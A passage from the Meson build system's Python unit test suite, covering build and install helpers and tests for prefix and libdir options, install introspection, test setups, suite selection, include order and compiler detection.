old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
